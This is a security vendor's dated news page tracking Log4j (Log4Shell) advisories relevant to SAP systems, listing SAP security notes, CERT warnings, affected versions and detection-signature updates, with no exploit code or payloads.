Log4j – Newsticker

log4j-news

Due to the high level of uncertainty and numerous inquiries about the current security situation surrounding the Apache Log4j security vulnerabilities, we have decided to summarize all relevant information and chronological reference in context with SAP for you on this page. We will update this page regularly, so make sure you don’t miss out, but bookmark this page.

RECENT UPDATES

18th January 2022

[SAP Launchpad Support] Note 3142773 – Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP Commerce. The SAP Security Note describes a workaround to mitigate the Log4Shell risk. 

https://launchpad.support.sap.com/#/notes/3142773
(login required)

18th January 2022

[SAP Launchpad Support] Note 3130920 – Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP Data Intelligence 3 (on-premise). The SAP Security Note describes a workaround to mitigate the Log4Shell risk. 

https://launchpad.support.sap.com/#/notes/3130920
(login required)

24th December 2021

[SAP Launchpad Support] Central Security Note for Apache Log4j 2 component has been updated. The Note summarizes the Security Notes, and SAP Notes/KBA’s describing a workaround.

https://launchpad.support.sap.com/#/notes/3131047
(login required)

24th December 2021

23rd December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component KM-WPB-MGR. Note 3132964 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP Enable Now Manager

https://launchpad.support.sap.com/#/notes/3132822
(login required)

22nd December 2021

[SecurityBridge Platform] Version 6.02 introduces dedicated controls to check for Log4Shell vulnerabilities. Customers can find additional information on KB-Page (login required) for Compliance Check 5060 with use-case for Log4Shell [KB, login required].

22nd December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-XS-ADM. Note 3132822 – [CVE-2021-45046] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in XSA Cockpit

https://launchpad.support.sap.com/#/notes/3132822
(login required)

22nd December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-CP-XF-KYMA. Note 3132744 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP BTP Kyma

https://launchpad.support.sap.com/#/notes/3132744
(login required)

21th December 2021

(UPDATED, December 21, 2021, 2.25pm EST) SAP customer message: “SAP’s Response to CVE-2021-44228 Apache Log4j 2” published Support Portal

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf
(Login required)

21st December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-NEO-SVC-IOT. Note 3132922 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in Internet of Things Edge Platform

https://launchpad.support.sap.com/#/notes/3132922
(login required)

21st December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-CP-CF-RT. Note 3130578 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in SAP BTP Cloud Foundry

https://launchpad.support.sap.com/#/notes/3130578
(login required)

20th December 2021

[SAP Launchpad Support] A priority ‘High’ SAP Note/KBA has just been released on component IS-PMED-HPH. Note 3131824 – [CVE-2021-44228] Log4j Vulnerability in Connected Health Platform 2.0 – Fhirserver

https://launchpad.support.sap.com/#/notes/3131824
(login required)

20th December 2021

[Info] You have probably already consulted various information about Log4Shell. This video explains the background and history of the Log4Shell vulnerability.

17th December 2021

[SecurityBridge Platform] A new version of the DEFAULT detection signatures was published with new settings for Listener 1082 – Suspicious web service calls [KB, login required] and Listener 1086 – Suspicious HTTP calls (avail. from v6.01.0) [KB, login requried], which are capable to detect the Log4Shell exploitation.   

The latest signature can be downloaded from SecurityBridge Support Portal: [KB, login requried].

17th December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-SEC-ETD. Note 3131272 – CVE-2021-44228, CVE-2021-45046: Apache Log4j vulnerabilities in SAP Enterprise Threat Detection and SAP Enterprise Threat Detection Log Collector

https://launchpad.support.sap.com/#/notes/3131272
(login required)

17th December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-XS-RT. Note 3130698 – Remediating log4j CVE-2021-44228 vulnerability in XS Advanced Platform and applications

https://launchpad.support.sap.com/#/notes/3130698
(login required)

16th December 2021

[SAP Launchpad Support] A priority ‘Very High’ SAP Note/KBA has just been released on component BC-XI-CON-JWS. Note 3130521 – [CVE-2021-44228] Remote Code Execution vulnerability associated with Apache Log4j 2 component used in Java Web Service Adapter of SAP NetWeaver Process Integration
https://launchpad.support.sap.com/#/notes/3130521
(login required)

16th December 2021

(UPDATED, December 16, 2021, 4.20pm EST) SAP customer message: “SAP’s Response to CVE-2021-44228 Apache Log4j 2” published Support Portal

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf
(Login required)

16th December 2021

[Fortinet] Securing SAP Landscapes against CVE-2021-44228 (Log4j, Log4j2 or Log4Shell) (fortinet.com).  SecurityBridge and FortiGate, can detect and block the log4j attacks against SAP Systems and display the exploitation within SecurityBridge Threat Detection to correlate with internal SAP alerts and events.

16th December 2021

[SecurityBridge Platform] A new version of the Threat Detection signature template was published. The signature contains new settings for L1086 – Suspicious HTTP calls [KB]. Using the new signatures it will be possible to detect the Log4Shell attack patterns.
Ensure to activate automatic updates as described here Signature Updates | Automatic-updates [KB].
Alternatively, upload the latest version manually into your Controller system, see Signature Updates | Latest-Version [KB].

16th December 2021

[National Cyber Security Centrum] https://github.com/NCSC-NL/log4shell Good Github page from the National Cyber Security Centrum https://www.ncsc.nl/ with indicators of compromise, an overview for Log4j scanning software, and an overview of Log4j related software.

16th December 2021

[SAP Launchpad Support] A new priority ‘Very High’ SAP Note/KBA has just been released on component XX-INT-SR. SAP recommends that you review it at your earliest convenience.
https://launchpad.support.sap.com/#/notes/3131047
(login required)

15th December 2021

[SAP Blog] Article that describes how you can check your HANA XSA systems and implement the mitigation. 
https://blogs.sap.com/2021/12/14/hana-xsa-log4j-cve-2021-44228/
(updated 2021-12-15 13:30 CET)

15th December 2021

[NIST] JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. This vulnerability is currently awaiting analysis.
https://nvd.nist.gov/vuln/detail/CVE-2021-4104

15th December 2021

(UPDATED, Version 21) CVE-2021-44228 – AS Java Core Components’ impact for Log4j vulnerability
https://launchpad.support.sap.com/#/notes/3129883
(login required)

15th December 2021

(UPDATED, Version 17) SAP Business Objects impacted for log4j vulnerability
https://launchpad.support.sap.com/#/notes/3129956
(login required)

14th December 2021

## Internal security assessment ##

All internal and customer facing components have been scanned with the result that no log4j vulnerability has been found. 

14th December 2021

Found on Lunasec.io goto the full article:
https://www.lunasec.io/docs/blog/log4j-zero-day/#affected-apache-log4j-versions

Affected Apache log4j Versions

log4j v2

Almost all versions of log4j version 2 are affected.

2.0-beta9 <= Apache log4j <= 2.14.1

LIMITED VULNERABILITY IN 2.15.0
As of Tuesday, Dec 14, version 2.15.0 was found to still have a possible vulnerability in some apps. We recommend updating to 2.16.0 which disables JNDI and completely removes %m{lookups}.
 
log4j v1
Version 1 of log4j is vulnerable to other RCE attacks, and if you’re using it you need to migrate to 2.16.0.

14th December 2021

Our Partner NO-MONKEY has searched for string Log4j in all pages of help.sap.com and releases the results on their GitHub Repository

https://github.com/NO-MONKEY/log4j_use_in_sap

14th December 2021

SAP Business Objects impacted for log4j vulnerability
https://launchpad.support.sap.com/#/notes/3129956
(login required)

14th December 2021

SAP Security Patch Day December: 

None of the released security patches contain fixes for vulnerable components impacted log4j 2.

14th December 2021

SAP customer message: “SAP’s Response to CVE-2021-44228 Apache Log4j 2” published Support Portal

https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf
(Login required)

13th December 2021

SAP HANA XS Advanced Platform potentially impacted for log4j – CVE-2021-44228

https://launchpad.support.sap.com/#/notes/3130698
(Login required)

13th December 2021

Further information on the Apache Log4j Security Vulnerabilities

https://logging.apache.org/log4j/2.x/security.html

13th December 2021

German Information security bureau warns about critical vulnerability log4j. https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html

12th December 2021

Switzerland CERT issues warning: Zero-Day Exploit Targeting Popular Java Library Log4j
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

10th December 2021

CERT-FR published its first notice under CERTFR-2021-ALE-022 on 10/12/2021
https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

Posted by

Till Pleyer
Share on linkedin
Share on twitter
Share on email

Looking into securing your SAP landscape? This white-paper tells you the “Top Mistakes to Avoid in SAP Security“. Download it now.

Meet us at ASUG Carolinas Chapter Meeting 2022

Come and meet us! On June 24, 2022 the US team of SecurityBridge will be at the ASUG Carolinas Chapter Meeting 2022. We are silver sponsor of the event and present with an exhibition table.

SecurityBridge at the VNSG Event

SecurityBridge will do a presentation together with our customer Achmea and hosting a booth to demonstrate the capabilities of the platform. The event runs all day from 09:00 to 16:00 with drinks and snacks to close the day.